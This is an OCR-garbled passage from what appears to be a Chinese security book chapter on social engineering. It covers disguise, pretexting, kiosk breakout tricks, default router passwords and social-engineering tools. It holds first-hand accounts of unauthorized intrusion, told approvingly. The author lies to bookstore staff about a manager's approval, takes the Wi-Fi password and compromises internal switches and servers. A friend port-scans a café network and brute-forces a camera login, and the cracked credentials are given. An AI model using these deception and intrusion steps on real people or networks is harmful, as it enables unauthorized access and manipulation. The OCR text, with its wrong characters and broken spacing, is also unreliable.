爱好 等 信息 都 是 十 分 容易 获得 的 ， 而 利用 这 些 信息 又 可 以 获得 更 多 更 需要 的 信息 。 掌 握 更 
多 的 信息 技术 ， 对 于 信息 搜集 来 说 益处 良 多 〈 例 如 人们 可 以 通过 一 张 照片 的 EXIF 信 息 便 
可 以 很 方便 地 找 出 这 张 照片 拍摄 的 位 置 、 拍 摄 的 工具 等 )。 


7.22 巧妙 地 伪装 和 大 胆 地 接触 目标 


伪装 ， 跟 踪 ， 人 为 制造 “相遇 ”的 巧合 ， 高 科技 窃取 信息 ， 快 速 逃离 现场 。 这 看 起 来 
就 像 是 在 谍 战 片 中 才 会 出 现 的 场景 ， 其 实现 代 谍 战 片 情节 很 大 程度 上 参考 了 社会 工程 学 的 
理念 ， 或 者 可 以 说 ， 间 谍 活 动 本身 就 是 一 种 高 级 的 社会 工程 学 行为 。 在 社会 工程 学 攻击 者 
眼中 ， 近 距离 接触 目标 是 最 有 意思 的 环节 了 ， 现 代 科技 尤其 是 互联 网 技术 给 “与 目标 保持 
距离 的 同时 窃取 信息 ”提供 了 完美 的 桥梁 ， 这 距离 可 以 是 5 米 、10 米 ， 也 可 以 是 相隔 千里 
通过 网 络 保持 联系 。 黑 客 通常 使 用 人 机 互动 的 方式 来 获取 信息 ， 但 有 时 主动 出 击 能 带 来 更 
好 的 效果 。 本 节 中 笔者 将 与 读者 们 分 享 更 多 的 接触 型 社会 工程 学 攻击 技巧 ， 并 针对 这 些 技 
巧 提出 防范 方案 。 


7.2.3 伪装 的 艺术 


当 社 会 工程 学 攻击 者 试图 达成 一 个 目标 时 ， 往 往 会 对 自己 进行 一 定 的 伪装 。 这 种 伪装 
并 不 是 随意 的 ， 而 是 根据 目标 和 将 要 实施 的 行动 进行 选择 性 伪装 。 当 目标 是 一 名 教授 时 ， 
想 要 接近 他 /她 ， 攻 击 者 会 套 上 IT 恤 ， 穿 上 和 牛仔裤 与 运动 鞋 ， 背 上 一 只 看 起 来 塞 满 了 书 的 休 
闲 包 ， 最 好 再 戴 上 一 副 看 起 来 文 约 约 的 眼镜 ， 以 学 生 的 身份 出 场 往 往 会 是 个 好 主意 。 而 目 
标 是 一 家 公司 时 ， 送 快递 的 小 哥 套装 则 是 更 合适 的 选择 。 相 比 神秘 复杂 的 易 容 术 ， 一 只 魔 
术 头 巾 有 时 候 可 以 带 来 更 好 的 效果 ， 在 遮 住 2/3 面 部 的 情况 下 ， 带 上 帽子 会 减少 引起 注意 
的 几率 。 这 些 道具 都 非常 好 找 ， 通 过 一 个 网 上 商城 就 可 以 全 部 办 到 。 攻 击 者 给 自己 准备 多 
种 身份 的 名 片 也 是 很 重要 的 步骤 。 

上 面 的 描述 是 现实 中 的 伪装 ， 在 外 形 和 行为 上 尽情 发 挥 自己 的 想象 力 ， 有 些 人 便 能 够 
获得 无 数 种 身份 。 不 过 ， 互 联网 时 代 还 给 攻击 者 带 来 了 另 一 种 伪装 的 方式 ， 在 网 上 与 目标 
接触 时 ， 只 需要 极 少 的 努力 ， 一 些 社交 软件 账户 和 简单 的 引导 性 交流 ， 剩 下 的 步骤 便 全 部 
由 对 方 的 想象 力 完成 。 这 也 意味 着 如 何 出 现 变 得 非常 重要 。 互 联网 上 的 人 们 多 半 对 陌生 
人 有 着 很 高 的 警惕 性 ， 所 以 一 个 失败 的 出 场 或 者 不 断 地 角色 变更 会 导致 彻底 失去 对 方 的 
信任 。 

而 在 现实 中 ， 这 样 的 接触 也 是 有 着 极 高 技巧 性 的 。 人 是 群居 动物 ， 人 们 每 天 都 在 和 不 
同 的 人 接触 。 虽 然 有 着 固定 的 小 圈子 并 对 陌生 人 有 着 天 生 的 稚 持 ， 却 也 不 会 拒绝 与 那些 有 
充分 理由 出 现 的 人 交流 。 当 交流 成 为 必要 时 ， 带 着 充足 的 理由 出 现在 目标 的 面前 绝 不 会 太 
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糟糕 ， 对 于 普通 人 而 言 ， 学 会 倾听 ， 自 信 的 交流 风格 往往 足够 带 来 一 个 良好 的 社交 图 ， 与 
意气 相投 的 人 磨合 而 成 为 朋友 不 是 一 件 困 难 的 事情 。 但 对 于 一 个 社会 工程 师 来 说 ， 接 触 是 
短暂 的 ， 所 以 一 定 要 在 最 短 的 时 间 内 把 效率 最 大 化 ， 同 时 也 出 于 保护 自身 的 原因 ， 伪 装 就 
有 了 存在 的 必要 性 ， 有 针对 性 地 将 自己 伪装 成 一 类 人 并 用 这 个 伪装 的 身份 与 目标 交流 ， 获 
取信 息 非常 有 效 ， 但 也 限制 了 沟通 的 次 数 和 时 间 : 在 伪装 身份 下 过 于 频繁 地 与 目标 接触 很 
容易 引起 对 方 警觉 或 异常 的 感受 。 

然而 ， 大 多 数 情况 下 即使 是 现实 中 出 击 的 社会 工程 学 攻击 者 并 没有 必要 把 自己 置 于 
离 目标 太 近 的 位 置 。 因 为 每 个 人 在 生活 中 其 实 都 在 不 停 地 传播 和 自己 相关 的 信息 。 走 过 的 
路 ， 购 买 的 食物 ， 进 行 沟通 的 人 群 等 都 能 反映 出 目标 的 特征 。 社 会 工程 师 通过 成 为 一 个 观 
察 者 即 可 得 到 大 量 的 信息 ， 而 互联 网 还 带 来 新 的 便利 。 个 人 通过 网 络 向 外 传播 的 信息 量 同 
样 很 大 ， 所 以 作为 接触 者 ， 除 了 面对面 交流 和 保持 一 定 距离 的 观察 外 ， 使 监控 者 进行 主动 


办 到 。 很 多 人 在 发 现 自己 的 身边 有 没 设置 密码 的 无 线 热点 时 都 会 毫 不 犹 静 地 连接 进去 ， 丝 
毫 不 顾 虚 潜在 的 安全 问题 。 这 时 只 需要 在 网 关 处 进行 抓 包 (还 记得 在 无 线 安全 章节 的 知识 
ш? 下 次 各 位 连接 没有 密码 的 WiFi 时 ， 可 要 注意 一 下 ) ， 即 可 获取 用 户 通过 互联 网 向 外 发 
送 以 及 向 内 接收 的 信息 ， 从 而 获得 达成 目标 的 机 会 。 

掌握 足够 多 的 专业 术语 既 能 够 让 你 的 目标 相信 你 所 扮演 的 身份 ， 也 能 让 对 话 更 和 谐 轻 
松 地 进行 下 去 。 专 业 术语 的 必要 性 在 于 ， 对 方 了 解 你 的 身份 之 后 ， 知 道 你 了 解 对 应 的 知识 
或 者 常识 术语 ， 能 从 侧面 证 实 你 的 身份 ， 使 你 的 身份 更 加 符合 你 所 希望 扮演 的 角色 ,并且 
为 接 下 来 的 社工 活动 做 铺垫 。 当 然 ， 一 个 合理 的 场景 和 话题 也 同样 重要 ， 即 便 你 掌握 再 多 
的 专业 术语 ， 用 错 了 场合 ， 那 也 是 白搭 。 下 面 来 看 一 个 例子 : 如 果 想 通过 “单车 爱好 者 ” 
的 身份 接近 另 一 位 “单车 爱好 者 ”， 那 么 你 除了 掌握 单车 运动 的 各 种 专业 术语 之 外 ， 还 需 
要 掌握 其 中 的 一 些 忌讳 ， 例 如 借 车 一 一 在 爱 车 如 命 的 单车 世界 里 借 车 完全 是 外 行人 才 会 干 
的 事 。 


724 交流 的 技巧 


除了 伪装 ， 交 流 对 于 社会 工程 学 也 尤为 重要 ， 下 面 将 通过 实例 来 分 析 一 些 实用 的 社会 
工程 学 交流 技巧 。 

很 多 人 认为 ， 人 类 和 动物 最 大 的 区 别 就 在 于 人 们 拥有 一 套 完整 而 高 级 的 语言 体系 ， 可 
以 让 每 个 个 体 间 更 好 地 相互 交流 ， 促 进 思想 的 融合 和 社会 的 进步 。 很 多 人 说 ， 交 流 是 一 门 
艺术 ， 可 事实 上 人 们 的 大 脑 往往 都 只 是 用 “会 说 话 ” 三 个 字 来 描述 这 门 “艺术 ”。 那 么 交 
流 真 的 只 是 会 说 话 这 么 简单 吗 ? 当然 不 是 。 人 与 人 的 交流 是 信息 的 沟通 ， 聪 明 的 交流 艺术 
家 们 往往 会 使 用 一 套 模型 来 描述 信息 沟通 的 全 过 程 ， 这 个 模型 中 包含 了 8 个 要 素 : 信息 发 
送 方 、 传 达 的 信息 、 对 发 送信 息 的 编码 、 信 息 传播 的 通道 《信道 ) 、 信 息 接收 方 、 解 码 过 
程 、 信 息 传递 过 程 中 的 杂音 和 收 到 信息 后 接收 方 对 信息 发 送 方 的 反馈 。 这 些 基 本 要 素 相互 
之 间 的 关系 如 图 7-1 所 示 。 
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图 7-1 信息 沟通 基本 要 素 相 互 关系 模型 
发 送 方 将 自己 想 要 传达 的 信息 编码 后 通过 信道 将 信息 传达 给 接收 方 ， 而 接收 方 收 到 信 
息 后 将 信息 解码 为 自己 可 以 理解 的 形式 ， 并 给 予 发 送 方 一 定 的 反馈 ， 在 这 个 过 程 中 ， 传 播 
中 的 噪声 将 会 影响 到 信息 传递 的 效果 从 而 间接 地 干扰 到 接收 方 的 反馈 。 
这 样 的 说 明 对 于 读者 来 说 肯定 还 有 些 抽象 ， 下 面 用 一 个 实例 来 解释 在 实际 应 用 中 ， 这 
个 模型 如 何 匹 配 到 交流 过 程 中 的 每 一 个 元 素 。 


张 三 和 李 四 是 一 对 异地 恋 的 情侣 ， 张 三 每 周 都 要 给 李 四 写 一 封 信 诉 说 自己 这 周 的 生活 。 


在 这 个 实例 中 ， 张 三 即 是 模型 中 的 信息 发 送 方 ， 她 想 要 和 李 四 分 享 的 生活 细节 是 需 
要 发 送 的 信息 ， 将 这 些 信 息 用 文字 书写 在 信纸 上 并 封装 即 是 编码 的 过 程 ， 邮 寄 方 式 是 这 次 
交流 的 信道 ， 作 为 接收 方 的 李 四 拆 开 信 封 阅读 信件 的 过 程 即 是 信息 解码 过 程 。 而 窗外 的 天 
气 ， 隔 壁 王 二 麻子 的 暗 送 秋波 都 是 此 次 信息 传输 过 程 中 的 噪声 ， 李 四 在 收 到 信件 后 可 能 会 
用 QQ、 微 信 或 书信 的 方式 回复 张 三 ， 这 就 是 接收 方 给 发 送 方 的 反馈 。 

从 上 述 的 模型 中 可 以 清楚 地 看 到 ， 在 一 次 信息 沟通 过 程 中 人 们 可 以 操作 的 环节 ， 这 是 
有 计划 地 发 起 一 次 交流 性 信息 获取 的 基础 。 当 然 ， 在 安全 领域 的 实际 应 用 中 ， 事 情 往往 
要 复杂 得 多 ， 一 次 成 功 的 社会 工程 学 攻击 行动 往往 涉及 好 几 次 不 同形 式 〈 通 常 在 此 语 境 
下 人 们 所 说 的 不 同形 式 ， 其 区 别 都 在 于 信息 沟通 的 通道 ) 的 交流 过 程 ， 所 以 有 计划 地 设计 
一 次 行动 流程 以 及 其 中 每 个 交流 环节 的 逻辑 链 才能 让 社会 工程 学 攻击 的 实施 者 更 加 从 容 不 
迫 ， 从 而 更 轻松 地 达成 目标 。 在 了 解 如 何 构造 行动 流程 以 及 逻辑 链 之 前 ， 先 来 看 这 样 一 个 
片段 : 


两 个 年 轻 人 背 着 包 来 到 一 家 书店 ， 在 二 楼 找 了 两 张 椅子 坐 下 后 从 包 中 取出 了 计算 机 。 
三 分 钟 后 其 中 一 人 起 身 到 三 楼 找到 一 台 触 摸 式 自助 图 书 查询 终端 机 并 打开 了 几 个 奇怪 的 窗 
口 。 此 举 引 起 了 书店 管理 人 员 的 注意 并 上 前 查看 ， 年 轻 人 并 没有 因此 走 开 ， 而 是 主动 与 其 
搭 了 几 身 话 后 将 屏 莫 恢 复 成 来 时 的 样子 ， 去 书架 取 了 两 本 书 ， 回 到 二 楼 与 同伴 优 武 游 起 地 
坐 了 一 个 下 午 。 


读者 或 许 还 有 些 不 解 ， 这 两 个 年 轻 人 是 为 何 而 来 ， 又 做 了 什么 呢 ? 事实 上 这 是 笔者 的 
一 次 亲身 经 历 ， 为 了 向 朋友 证 明 漏洞 在 人 们 的 生活 中 无 处 不 在 ， 笔 者 决定 针对 自己 最 喜欢 
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去 的 书店 进行 一 次 社会 工程 学 攻击 ， 并 尝试 获取 书店 部 分 内 部 信息 来 展示 大 多 数 企 业 对 于 
保护 自身 安全 的 无 能 。 当 然 ， 我 们 双方 都 为 此 下 了 注 ， 赌 注 是 一 顿 自助 餐 。 

确定 目标 后 ， 笔 者 首先 对 书店 进行 了 一 次 侦察 ， 发 现 其 查询 终端 机 缺少 对 用 户 输入 的 
限制 ， 而 查询 终端 机 往往 是 接 入 公司 内 网 的 ， 管 理 员 通 过 终端 机 进行 的 操作 记录 也 极其 可 
能 泄露 重要 的 信息 。 可 这 家 书店 每 层 都 有 很 多 工作 人 员 管 理 ， 光 明正 大 地 操作 终端 机 显然 
不 聪明 ， 通 过 给 不 连接 外 网 的 终端 机 植 入 木马 远程 控制 渗透 显然 也 不 是 什么 好 主意 。 但 抱 
着 “既然 问题 存在 ， 就 应 当 加 以 利用 ”的 原则 ， 笔 者 最 终 还 是 决定 以 这 台 终 端 机 作为 突破 
口 来 渗透 目标 书店 ， 并 很 快 制订 了 一 个 如 下 的 渗透 方案 : 


与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 一 进入 书店 对 终 
端 机 进行 操作 一 通过 内 网 渗透 获取 信息 。 


在 这 次 渗透 行动 中 ， 主 要 需要 考虑 的 只 有 两 次 交流 ， 首 先是 从 书店 管理 层 获 得 测试 许 
可 ， 其 次 则 是 如 何 面 对 普 通 工作 人 员 和 保安 的 盘问 。 

在 互联 网 上 进行 了 仔细 的 寻找 后 ， 笔 者 并 没有 发 现 该 书店 任何 管理 人 员 如 手机 号 或 个 
人 邮箱 等 联系 方式 ， 但 作为 一 家 大 型 连锁 书店 ， 通 过 其 网 站 上 的 客服 QQ 联系 工作 人 员 总 
是 个 可 行 的 方案 ， 虽 然 这 些 客服 QQ 的 主人 未 必 具 有 许可 的 权限 ， 但 他 们 一 定 拥 有 向 上 级 
反馈 的 渠道 ， 抱 着 这 样 的 想法 ， 笔 者 开始 设计 初次 交流 的 逻辑 链 了 。 

一 次 有 价值 的 交流 不 同 于 闲聊 ， 想 要 从 交流 中 获 益 就 必须 有 明确 的 逻辑 性 ， 而 拥有 一 
个 好 的 逻辑 链 的 第 一 步 ， 就 是 拥有 明确 的 目的 。 

首先 可 以 直接 将 行动 规划 中 的 部 分 逻辑 代入 作为 目标 ， 所 以 这 里 笔者 的 目的 就 是 : 


与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 。 
先 将 达成 目标 的 综合 行为 代入 逻辑 链 : 


通过 与 书店 网 站 客服 沟通 获得 引荐 一 与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查 
询 系统 漏洞 ”的 许可 。 


再 把 交流 模型 代入 到 行为 中 : 

信息 发 送 方 : 笔者 + 要 编码 的 信息 《应 当 将 笔者 引荐 给 书店 管理 层 人 员 ) 一 编码 一 信 
й. 互联 网 一 接收 方 : 书店 官方 客服 一 解码 信息 〈 认 可 笔者 的 要 求 ) 一 将 笔者 引荐 给 书店 
管理 层 一 与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 。 


确定 交流 模型 的 具体 元 素 后 ， 作 为 信息 发 送 方 尤其 要 对 编码 环节 进行 设计 ， 在 当前 的 
说 服 实例 中 ， 证 明 自己 的 能 力 并 提出 要 求 显然 是 一 个 不 错 的 方案 ， 将 其 放 入 逻辑 链 中 对 应 
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的 地 方 ， 再 把 整个 逻辑 链 加 以 整理 。 


寻找 一 个 话题 一 对 书店 客服 人 员 发 起 交流 一 引起 对 方 的 兴趣 一 让 对 方 对 自己 放松 警惕 
一 证 明 自 己 的 专业 性 一 提出 合理 的 请 求 一 说 服 书 店 网 站 的 客服 人 员 一 将 笔者 引荐 给 书店 管 
理 层 一 与 书店 管理 层 沟通 一 获取 进行 “测试 书店 终端 查询 系统 漏洞 ”的 许可 。 


制定 好 逻辑 链 后 ， 就 是 计划 实施 环节 了 。 作 为 一 个 安全 人 员 的 一 大 好 处 就 是 ， 一 旦 你 
告诉 别人 自己 做 的 事情 ， 总 是 可 以 很 快 引起 他 们 的 兴趣 ， 当 然 在 这 之 前 你 需要 证 明 自 己 。 

能 引起 对 方 注意 的 话题 中 最 有 效 的 就 是 让 他 们 意识 到 自己 对 身边 事物 的 认 知 出 现 了 偏 
差 ， 比 如 对 自己 公司 网 站 的 安全 性 抱 有 了 过 大 期 望 ; 经 过 短暂 的 研究 ， 笔 者 很 快 发 现 了 该 
书店 官网 存在 的 一 处 问题 并 登录 进 网 站 后 台 ， 这 就 足够 了 ， 笔 者 没有 继续 深入 而 是 截图 直 
接 联 系 了 客服 汇报 了 这 个 问题 。 看 样子 该 网 站 的 客服 是 从 来 没有 遇见 过 白 帽 子 提交 漏洞 的 
情况 ， 显 得 很 惊讶 。 这 时 笔者 表示 自己 是 一 个 学 生 ， 为 了 完成 学 校 要 求 的 课外 活动 想 要 对 
自己 最 爱 的 书店 进行 一 次 公益 的 安全 性 检查 ， 并 希望 能 获得 许可 。 很 快 客服 人 员 便 答应 向 
信息 主管 汇报 此 事 ， 并 在 得 到 回复 后 向 笔者 留 下 的 邮箱 中 发 送 通知 邮件 。 

交流 进行 得 很 成 功 ， 可 是 现实 却 不 尽 如 人 意 ， 过 了 几 天 笔者 仍 未 收 到 书店 的 通知 ， 
于 是 联系 了 上 次 沟通 的 客服 人 员 ， 他 很 遗憾 地 告诉 笔者 信息 主管 X 先 生出 差 了 暂时 联系 不 
上 ， 所 以 短期 内 不 能 给 出 答复 。 当 然 ， 笔 者 对 此 毫 不 感到 遗憾， 信息 主管 出 差 这 个 情报 是 
一 个 很 有 价值 的 信息 ， 知 道 了 这 条 信息 后 的 第 二 天 ， 笔 者 与 一 个 朋友 就 带 着 计算 机 出 现在 
了 目标 书店 。 紧 接着 就 发 生 了 上 面 片 段 中 的 一 幕 ， 笔 者 在 操作 终端 机 时 忽然 发 现 其 连接 的 
居然 是 书店 无 线 网 ， 于 是 查看 并 记 下 了 热点 的 密码 。 在 这 期 间 书店 的 工作 人 员 前 来 询问 并 
制止 违规 操作 ， 于 是 笔者 对 他 说 自己 已 经 向 信息 主管 请 示 过 ，X 主 管 说 笔者 可 以 随便 来 书 
店 试 试看 。 借 一 个 虚拟 的 管理 人 员 把 反常 的 事情 轻描淡写 带 了 过 去 是 很 有 效 的 一 招 ， 尽 管 
工作 人 员 表示 没有 收 到 通知 ， 但 潜意识 中 也 已 经 认可 了 这 种 操作 行为 并 不 构成 什么 威胁 。 

笔者 完成 了 查看 热点 口令 的 操作 并 从 运行 窗口 看 到 了 历史 记录 中 访问 共享 服务 器 的 
记录 后 ， 通 过 笔记 本 电脑 连接 了 书店 内 部 网 络 ， 并 在 共享 服务 器 中 发 现 了 很 多 共享 给 员工 
用 的 设备 管理 账户 、 密 码 ， 通 过 这 些 账户 和 口令 进一步 攻陷 了 内 网 中 的 几 台 交换 机 与 服务 
器 。 之 后 笔者 将 该 漏洞 反馈 给 了 书店 的 工作 人 员 ， 同 时 也 赢得 了 一 顿 自助 餐 。 

除了 上 述 场景 ， 在 日 常生 活 中 使 用 交流 模型 可 以 让 谈话 变 得 更 加 理性 ， 而 构造 逻辑 链 
的 行为 在 很 多 场景 ， 如 应 聘 、 请 假 、 商 业 谈 判 中 都 可 以 带 来 莫大 的 帮助 。 





73 ”人 们 经 常 忽略 的 安全 边界 


如 果 询 问 一 名 安全 专家 如 何 保障 个 人 隐私 和 财产 安全 ， 一 本 厚 厚 的 书 也 许 都 无 法 记 完 
回答 。 而 对 于 “大 众 应 当 如 何 防御 社会 工程 学 攻击 ”这 样 的 问题 ， 答 案 往往 却 是 无 解 。 木 
桶 效应 指出 : 一 只 木 桶 能 装 多 少 水 取决 于 它 最 短 的 那 块 木板 ， 同 样 的 道理 也 适用 于 安全 体 
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系 。 一 个 体系 的 安全 强度 取决 于 它 最 不 安全 的 边界 ， 当 社会 工程 师 把 目光 投向 整个 生活 中 
的 安全 问题 时 ， 漏 洞 和 问题 将 变 得 比比 缘 是 。 这 些 漏洞 和 问题 往往 就 伴随 着 人 们 的 粗心 大 
意 、 满 不 在 乎 和 一 知 半 解 ， 可 在 这 些 最 薄弱 的 边缘 环节 出 现 的 问题 ， 有 时 却 可 能 导致 整个 
安全 大 厦 的 骨 塌 。 社 会 工程 师 需 要 有 一 双 擅 长 发 现 被 人 们 忽略 了 的 问题 的 眼睛 ， 本 章 也 将 
就 这 类 问题 中 的 一 些 为 读者 进行 深入 浅 出 地 讲解 。 


7.3.1 终端 机 安全 


上 节 的 故事 中 ， 读 者 就 已 经 见 到 了 一 次 真实 的 由 终端 机 引起 的 安全 事故 。 事 实 上 终端 
机 漏洞 正 是 笔者 最 津津 乐 道 的 一 类 问题 ， 因 为 这 些 设备 的 持 有 者 往往 都 是 银行 、 公 司 、 商 
场 、 学 校 等 大 型 目标 ， 这 些 厂商 可 能 会 投入 大 笔 的 资金 来 确保 其 安全 性 ， 可 终端 机 这 样 的 
“ 短 板 ” 一 旦 出 现 问 题 就 可 能 导致 整个 大 的 安全 体系 土 朋 瓦 解 。 

当然 ， 大 多 数 的 终端 机 在 常规 用 户 操作 下 都 是 不 会 出 现 问 题 的 ， 那 么 恶意 攻击 者 又 是 
怎么 利用 这 些 设备 的 呢 ? 最 重要 的 自然 是 要 让 这 些 基于 操作 系统 的 大 家 伙 们 回 到 操作 系统 
界面 。 导 致 这 类 漏洞 出 现 的 可 能 原因 可 以 分 为 硬件 问题 和 软件 问题 ， 下 面 将 为 大 家 一 一 
介绍 。 


1. 硬件 处 置 不 当 导 致 的 终端 机 系统 被 破解 


(1) 存在 外 置 的 USB 接 口 。 当 一 个 终端 机 没有 将 其 外 置 的 USB 接 口 封 起 来 时 ， 就 像 
是 一 块 送 给 攻击 者 吃 的 肥 肉 ， 历 届 黑 帽 大 会 上 ， 甚 至 曾 有 黑客 演示 过 通过 插入 恶意 USB 设 
备 让 指定 型 号 的 ATM 吐 钱 的 案例 。 当 然 ATM 的 USB 接 口外 露 现 在 已 经 几乎 见 不 到 了 ， 但 
很 多 公司 的 设备 仍然 如 此 ， 这 种 情况 下 恶意 攻击 者 只 需要 插入 一 个 键盘 设备 即 可 控制 整 台 
机 器 。 

(2) 电源 暴露 在 外 且 无 人 管理 。 很 多 终端 机 是 通过 在 开机 启动 项 中 加 入 软件 启动 的 
脚本 来 在 开机 后 打开 应 用 软件 的 ， 这 样 如 果 电 源 暴露 在 外 ， 攻 击 者 只 需要 将 机 器 重启 ， 并 
利用 终端 机 刚刚 进入 操作 系统 的 时 间 进 行 恶 意 操作 ， 例 如 杀 死 应 用 软件 进程 ， 即 可 阻止 其 
进入 不 可 操作 的 界面 。 


2. 软件 设置 不 当 导致 的 终端 机 被 破解 问题 


COD 管理 员 留 下 了 方便 管理 机 器 的 后 门 。 很 多 懒惰 的 管理 员 为 了 方便 自己 管理 终端 
机 ， 可 能 会 设置 一 些 特殊 手势 使 机 器 回 到 桌面 ， 例 如 双 指 旋转 等 。 攻 击 者 可 以 多 尝试 几 种 
手势 来 调 出 系统 界面 ， 同 时 ， 藏 在 桌面 边缘 的 键盘 也 会 导致 问题 ， 如 果 权 限 足 够 的 话 攻击 
者 可 以 直接 调 出 CMD 来 操作 机 器 ， 或 按 Win+D 组 合 键 直接 回 到 桌面 ， 如 图 7-2 所 示 。 

(2) 没有 禁止 右键 动作 。 在 安装 应 用 软件 之 前 ， 大 多 数 终端 机 触 屏 都 是 支持 右键 操 
作 的 ， 例 如 长 按 动 作 和 旋转 动作 ， 如 果 应 用 软件 没有 禁止 用 户 的 右键 操作 ， 那 么 通过 打印 
机 等 功能 再 调 出 系统 目录 ， 打 开 软 键盘 即 可 操作 当前 终端 机 。 

(з) 软件 漏洞 。 有 些 终端 机 应 用 软件 本 身 就 存在 漏洞 ， 一 些 违法 的 用 户 操作 ， 例 如 
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按键 盘 同时 单 击 屏幕 上 的 相同 功能 键 ， 或 者 多 指 触 控 快速 点 击 等 即 可 导致 软件 朋 溃 ， 攻 击 


者 从 而 能 够 达到 控制 目标 终端 机 的 目的 。 





图 7-2 ” 软 键盘 导致 的 终端 机 被 破解 


732 无 线 网 中 的 路 由 器 配置 问题 


从 各 大 运营 商 和 商业 巨头 开始 抢占 公共 热点 开始 ， 如 今 在 很 多 城市 从 商场 到 超市 ， 从 
咖啡 馆 到 路 边 小 吃 店 ， 到 处 都 有 公共 热点 的 影子 。 可 又 不 时 地 有 人 爆料 这 些 公共 热点 不 安 
全 ， 这 显然 是 正确 的 。 撤 开 恶 意 AP 不 谈 ， 很 多 私人 商家 设置 的 无 线 网 络 本 身 就 毫 无 安全 


性 可 言 。 





很 多 家 用 路 上 














器 是 不 强制 在 配置 中 修改 密码 的 ， 这 也 就 导致 了 很 多 没有 安全 意识 的 商 


家 在 配置 好 热点 后 从 来 没 想 过 要 修改 路 由 器 密码 ， 游 走 在 城市 中 ， 使 用 用 户 名 admin、 密 
码 admin 往 往 可 以 登录 一 大 批 没 有 修改 密码 的 路 由 器 。 当 恶意 攻击 者 进入 路 由 器 后 ， 可 以 
使 用 端口 转发 等 多 种 方式 来 窃取 和 监控 用 户 的 上 网 信息 。 





7.8.8 管理 员 对 内 网 环境 的 盲目 自信 


安全 问题 是 很 多 网 络 管理 员 都 容易 忽视 的 问 
题 ， 即 使 他 们 想到 外 界 有 很 多 穷 凶 极 恶 的 黑客 
也 不 会 意识 到 在 自己 的 内 网 里 ， 可 能 就 存在 几 台 
那 恶 的 计算 机 。 在 他 们 管理 下 的 很 多 设备 都 和 上 
述 无 线路 由 器 一 样 使 用 着 默认 密码 或 者 adtmin888 
这 样 极其 脆弱 的 弱 口 令 ， 就 如 这 台 影 院 的 交换 机 
一 般 ， 如 图 7-3 所 示 。 

说 到 内 网 中 的 设备 ， 最 让 攻击 者 激动 的 莫 过 
于 摄像 凑 了 ， 笔 者 的 一 位 朋友 就 很 热衷 于 在 城市 
中 寻找 漏洞 ， 下 面 就 是 他 针对 摄像 头 的 一 次 渗透 











图 7-3 ”笔者 随意 试 了 几 组 口令 就 直接 telnet 


全 过 程 ， 这 次 渗透 是 在 一 家 咖啡 厅 中 进行 的 。 登录 上 了 这 人 台 设 备 
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首先 ， 连 入 咖啡 厅 里 的 WiFi， 用 ipconfig 命 令 查看 所 处 的 网 络 环境 ， 可 以 看 到 本 机 的 
IP 地 址 是 192.168.1.105， 网 关 地 址 是 192.168.1.1， 如 图 7-4 所 示 。 
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and Settings Administrator: 


图 7-4 无线 网 络 环境 
然后 ， 尝 试 对 路 由 器 进行 访问 ， 很 遗憾 的 是 咖啡 厅 对 访 


Made By HEKE 完成 后 自动 保存 并 退出 。 


问 权限 进行 了 限制 。 接 下 来 ， 扫 描 所 处 网 段 的 端口 开放 情况 | 于 leoo1 efe oo 


( 见 图 7-5) 。 FRR 
这 里 将 端口 重新 设置 了 一 下 ， 分 别 设 置 了 21、80、 pmo cce Bers 


1433、3306、8000、8080、8081 几 个 端口 ，IP 端 设置 的 是 
192.168.1.1 一 192.168.1.255， 然 后 开始 扫描 。 不 一 会 扫描 结 
果 便 出 来 了 ， 简 单 整理 为 如 下 内 容 。 

192.168.1.1 80 

192.168.1.103 21 

192.168.1.205 80 

192.168.1.231 21 

从 经 验 判断 ，192.168.1.205 应 该 是 摄像 头 ， 尝 试 在 浏览 器 上 进行 访问 ， 如 图 7-6 所 示 。 








图 7-5 ”扫描 端口 








[e [Е ncs 7/182. 168 1 2057 e AALI 
auc me “=s m s= 

-E == = < = = - 1 =====] 
= =- = 























图 7-6 ”登录 接口 
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用 Burp 工 具 对 登录 框 进行 抓 包 并 尝试 暴力 破解 ， 很 快 便 爆 破 成 功 :， 用 户 名 为 admin; 
密码 为 adamin123， 并 成 功 登录 〈 见 图 7-7) 。 








图 7-7 用 Burp 工 具 破 获 用 户 名 、 密 码 并 成 功 登 录 
从 上 例 可 以 看 出 ， 这 些 被 人 们 忽略 的 设备 ， 其 安全 性 就 犹如 空气 一 般 不 堪 一 击 。 这 也 
正 是 安全 专家 们 对 于 个 人 信息 安全 能 够 给 出 无 数 建议 的 原因 ， 由 于 人 们 身边 存在 太 多 的 安 
全 隐患 ， 对 于 每 个 人 来 说 ， 武 装 到 牙齿 的 保护 也 未 必 能 够 确保 自己 的 隐私 或 者 信息 不 被 汇 
露 ， 也 只 能 做 得 越 多 越 好 了 。 





74 社会 工程 学 工具 


孔子 说 “ 工 欲 善 其 事 ， 必 先 利 其 器 ”， 相 信 大 家 都 耳熟能详 ， 好 的 工具 能 使 你 的 工作 
效率 提高 不 少 ， 熟 练 使 用 正确 的 工具 则 会 大 大 提高 工作 效率 ， 本 节 将 讲解 社会 工程 学 中 用 
到 的 工具 。 


7.4.1 在 线 工 具 


在 线 信息 搜集 的 重要 性 前 面 已 经 提 到 ， 下 面 首 先 来 看 看 社会 工程 学 中 的 在 线 工 具 。 
1. 搜索 引擎 


在 我 国 ， 绝 大 多 数 人 喜欢 使 用 的 搜索 引擎 不 是 谷歌 ， 而 是 百度 。 百 度 的 衍生 产品 也 非 
常 多 ， 例 如 百度 贴吧 ， 如 果 我 们 需要 查找 一 个 人 的 信息 资料 ， 有 什么 资料 比 他 自己 曾经 说 
过 的 话 更 直观 呢 ? 百度 贴吧 这 个 平台 则 很 可 能 会 令 人 满意 的 内 容 。 同 时 ， 搜 索引 擎 拥有 一 
种 “语法 ”， 善 用 搜索 引擎 的 语法 ， 能 达到 事半功倍 的 效果 。 


2. Maltego 
Maltego 是 一 款 功 能 非常 强大 的 软件 ， 它 能 够 自动 采集 大 量 信息 并 且 为 用 户 实现 数量 
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的 自动 关联 ， 可 以 为 用 户 节省 数 小 时 的 搜索 时 间 ， 并 且 可 以 展示 信息 的 关键 图 ， 它 的 真正 
强大 之 处 在 于 找到 这 些 数据 之 间 的 关系 ， 即 便 数 据 的 价值 很 高 ， 但 是 展示 信息 之 间 的 关系 
对 于 社会 工程 人 员 更 有 价值 。 


3. 社会 工程 人 员工 具 包 


